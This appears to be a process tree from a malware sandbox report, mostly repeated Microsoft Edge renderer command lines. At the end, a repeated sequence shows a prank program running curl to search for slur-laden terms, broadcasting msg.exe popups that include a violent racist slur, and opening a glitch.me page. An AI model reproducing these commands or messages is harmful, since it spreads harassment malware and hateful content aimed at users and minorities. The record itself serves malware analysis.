C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=9180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9232 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9380,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9408 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=9884,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9912 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=10220,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=9920 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=10560,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=10612 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=10836,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=10868 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=11008,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11044 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11228,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11208 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11404,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11016 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11568,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11600 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11808,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11752 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=11844,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=11996 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=12252,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12232 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=12428,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12280 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12596,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12584 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12788,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12768 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=12964,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=12992 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=13028,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13172 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13436,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13404 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13644,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13668 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13800,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13812 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=13988,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14004 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=13984,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14024 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=13960,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=13976 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=13640,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14604 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14864,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=14752 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=15120,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15168 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5320,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15480 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15388,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=15600,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15740 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=15880,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=15932 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=16136,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16176 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=16280,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16304 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=16452,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16516 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=16740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=16760 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=17332,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17368 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=4744,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17696 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=17888,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17920 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=18740,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=17880 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=19540,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19528 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=19940,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19968 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=732,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20124 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=20140,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=19600 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=20148,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20088 /prefetch:145⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=20260,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20284 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=20268,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20468 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=20784,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20772 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=20960,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20924 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --always-read-main-dll --field-trial-handle=21180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20812 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --always-read-main-dll --field-trial-handle=21372,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=21400 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --always-read-main-dll --field-trial-handle=2068,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --always-read-main-dll --field-trial-handle=21444,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2800 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --always-read-main-dll --field-trial-handle=21804,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=21956 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --always-read-main-dll --field-trial-handle=22120,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22084 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --always-read-main-dll --field-trial-handle=22372,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22420 /prefetch:15⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --always-read-main-dll --field-trial-handle=22276,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22540 /prefetch:15⤵
-
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
C:\Windows\system32\curl.execurl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "Rasauq on top"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "ran by Rasauq"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq owns me"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 " Rasauq is daddy"4⤵
-
-
C:\Windows\system32\msg.exemsg * /time:1 "kill all niggas"4⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/4⤵
-
-
